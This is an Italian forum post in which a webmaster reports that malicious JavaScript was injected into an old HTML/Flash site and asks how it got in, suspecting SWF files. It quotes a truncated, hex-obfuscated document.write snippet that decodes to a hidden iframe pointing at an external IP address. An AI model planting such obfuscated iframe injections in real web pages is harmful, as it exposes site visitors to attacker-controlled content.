Ciao a tutti,
in un sito che ho realizzato parecchio tempo fa ho verificato che hanno inserito del codice maligno:

<script language='JavaScript'>document.write(unescape('\x3 C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\ x68\ ...

che tradotto (in parte) da esadecimale a relativo valore asci:

<iframe src="http://79. ...

inserisce un iframe.

La mia domanda è questa: come hanno fatto ad inserirlo visto che il sito è reAlizzato solamente in HTML e FLASH senza utilizzare servizi di scripting e form?
Il provider è uno dei più grossi che ci siano quindi dubito che si tratti di server bucati.

che ci sia un "buco" nei file SWF?????